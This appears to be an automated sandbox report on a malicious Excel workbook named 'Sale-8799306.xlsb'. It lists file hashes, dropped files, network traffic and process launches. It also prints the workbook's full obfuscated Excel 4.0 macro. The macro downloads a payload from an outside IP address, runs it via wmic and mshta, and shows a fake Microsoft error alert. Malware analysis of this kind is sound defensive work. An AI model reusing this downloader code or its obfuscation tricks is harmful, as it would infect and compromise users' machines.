                                                            SHA-256:FE2624B6EC379802A875DFD63DA477C9E006597F17C3AE4FB20AB03D8C8320BF
                                                            SHA-512:E348265B35247E87075F00544037592A05DDE6C61FF2C21BD1EA62EDEA82853F1E5F28BC176467382572EA50E2670EEE3A65A4B2430B5E79D902E177C8AA73B7
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview: .PNG........IHDR.......=......8.....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                            C:\Users\user\Desktop\~$Sale-8799306.xlsb
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                            Static File Info

                                                            General

                                                            File type:Microsoft Excel 2007+
                                                            Entropy (8bit):7.784263057805307
                                                            TrID:
                                                            • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                            • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                            • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                            • ZIP compressed archive (8000/1) 5.73%
                                                            File name:Sale-8799306.xlsb
                                                            File size:54336
                                                            MD5:48a10cd89790785f31ebcfc2e1c96ee3
                                                            SHA1:bea251b714aefa43254dd9b252aeb04baf126041
                                                            SHA256:14ee8fe1b5df73dac77e228d5799595799cd07d9d0ed4ecb61247353d8241f72
                                                            SHA512:d660c41d1697146dd8ec109b0d4223fa7be5feaf0dc434491ef2abcfed06664034771c14828928d64982761b740911c5b9fa28b678c1dca439372a503a69d441
                                                            SSDEEP:768:UWBPiDbzNLo6CW2Z53SAPaWbpi3/BwfgMAIl2CqVlKj80BPodPG8f:UWBPIbZ853SAJbpSwfVl2Fsj8Agd+A
                                                            File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                            File Icon

                                                            Icon Hash:e4e2ea8aa4b4b4b4

                                                            Static OLE Info

                                                            General

                                                            Document Type:OpenXML
                                                            Number of OLE Files:1

                                                            OLE File "Sale-8799306.xlsb"

                                                            Indicators

                                                            Has Summary Info:
                                                            Application Name:
                                                            Encrypted Document:
                                                            Contains Word Document Stream:
                                                            Contains Workbook/Book Stream:
                                                            Contains PowerPoint Document Stream:
                                                            Contains Visio Document Stream:
                                                            Contains ObjectPool Stream:
                                                            Flash Objects Count:
                                                            Contains VBA Macros:

                                                            Macro 4.0 Code

                                                            0,564,=FOPEN(CHAR(67) & ":\" & CHAR(80) & CHAR(114) & "ogram" & CHAR(68) & "ata\CjBEfxIRZH.rt" & CHAR(102), 3)
                                                            2,564,=C8547+A1174
                                                            3,564,=B7891+C7568
                                                            6,564,=B7666+A100
                                                            13,564,=A5027+D7960
                                                            15,564,=FOR.CELL("riqXTKWALF",Sheet1!CI167:CM1114, TRUE)
                                                            16,564,=A6519+C3603
                                                            17,564,=D8594+B4152
                                                            18,564,=D2130+B472
                                                            23,564,=B6113+C4925
                                                            25,564,=FWRITE(0,CHAR(riqXTKWALF))
                                                            27,564,=D4680+D7661
                                                            30,564,=A613+B7559
                                                            31,564,=A6544+C3319
                                                            32,564,=D9617+A9067
                                                            34,564,=D1059+B3088
                                                            39,564,=B3472+C433
                                                            40,564,=NEXT()
                                                            42,564,=C8502+D2733
                                                            44,564,=C3213+A7204
                                                            45,564,=C9429+C7502
                                                            47,564,=D4264+B482
                                                            49,564,=C4229+C4568
                                                            55,564,=EXEC(CHAR(119) & "mic" & CHAR(32) & "pro" & CHAR(99) & "ess call creat" & CHAR(101) & "" & CHAR(32) & CHAR(34) & CHAR(109) & "shta C" & CHAR(58) & "\Pr" & CHAR(111) & "gram" & CHAR(68) & "ata\CjB" & CHAR(69) & CHAR(102) & "" & CHAR(120) & CHAR(73) & "RZH.rt" & CHAR(102) & CHAR(34))
                                                            56,564,=D8924+B3124
                                                            58,564,=B9896+A9079
                                                            59,564,=C9257+A1158
                                                            60,564,=A6194+D7218
                                                            65,564,=B3716+D9221
                                                            66,564,=D3943+C6134
                                                            67,564,=CALL("urlmon", "URLDo" & CHAR(119) & "nl" & CHAR(111) & "adT" & CHAR(111) & "Fil" & CHAR(101) & "" & CHAR(65) & "","JJC" & CHAR(67) & CHAR(74) & CHAR(74) & "", 0, "ht" & CHAR(116) & CHAR(112) & CHAR(58) & CHAR(47) & "/136." & CHAR(49) & "44.18" & CHAR(49) & ".1" & CHAR(55) & "4:8080/Q2W5V" & CHAR(87) & "UFL5VCMQ7" & CHAR(74) & "QPETG3CCTYX72Z4R25" & CHAR(80) & CHAR(68) & CHAR(71), "C:\Progra" & CHAR(109) & "Data\" & CHAR(114) & "" & CHAR(116) & CHAR(69) & "Tr" & CHAR(109) & CHAR(46) & "tx" & CHAR(116),0,0)
                                                            72,564,=A5014+D3599
                                                            74,564,=B6835+C8990
                                                            75,564,=D4690+B8884
                                                            76,564,=A4573+D3753
                                                            77,564,=D7528+D5321
                                                            78,564,=C1700+C2476
                                                            80,564,=B3854+B839
                                                            81,564,=ALERT("Er" & CHAR(114) & "or!" & CHAR(32) & "Sending re" & CHAR(112) & "ort to M" & CHAR(105) & "croso" & CHAR(102) & "t.." & CHAR(46))
                                                            82,564,=A2237+A4530
                                                            83,564,=D1019+D8238
                                                            84,564,=D592+D5421
                                                            85,564,=B7431+C5730
                                                            89,564,=C1246+A1429
                                                            91,564,=FOPEN("C:\" & CHAR(80) & "rogram" & CHAR(68) & "ata\rt" & CHAR(69) & "Trm.txt",1)
                                                            95,564,=C8759+B1225
                                                            98,564,=D506+B209
                                                            99,564,=C5796+A4713
                                                            101,564,=C9884+A1025
                                                            102,564,=D4696+A9213
                                                            103,564,=SEND.MAIL(EVALUATE(FREAD(US92,255)))
                                                            105,564,=A7297+D4031
                                                            106,564,=D5035+D3542
                                                            107,564,=A7738+B5238
                                                            109,564,=D8849+A6391
                                                            110,564,=C326+B2191
                                                            112,564,=D8897+B5536
                                                            113,564,=C7083+B2298
                                                            116,564,=C3151+B3385
                                                            117,564,=RETURN()
                                                            

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 06:26:44.817574024 CET491658080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:44.845652103 CET808049165136.144.181.174192.168.2.22
                                                            Nov 25, 2021 06:26:45.351830959 CET491658080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:45.379719973 CET808049165136.144.181.174192.168.2.22
                                                            Nov 25, 2021 06:26:45.882313967 CET491658080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:45.910336971 CET808049165136.144.181.174192.168.2.22
                                                            Nov 25, 2021 06:26:45.911659956 CET491668080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:45.939424038 CET808049166136.144.181.174192.168.2.22
                                                            Nov 25, 2021 06:26:46.443905115 CET491668080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:46.471673965 CET808049166136.144.181.174192.168.2.22
                                                            Nov 25, 2021 06:26:46.974426031 CET491668080192.168.2.22136.144.181.174
                                                            Nov 25, 2021 06:26:47.002305984 CET808049166136.144.181.174192.168.2.22

                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:06:27:13
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                            Imagebase:0x13f700000
                                                            File size:28253536 bytes
                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:06:27:35
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf"
                                                            Imagebase:0xff030000
                                                            File size:566272 bytes
                                                            MD5 hash:FD902835DEAEF4091799287736F3A028
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Start time:06:27:36
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\System32\mshta.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:mshta C:\ProgramData\CjBEfxIRZH.rtf
                                                            Imagebase:0x13f2d0000
                                                            File size:13824 bytes
                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >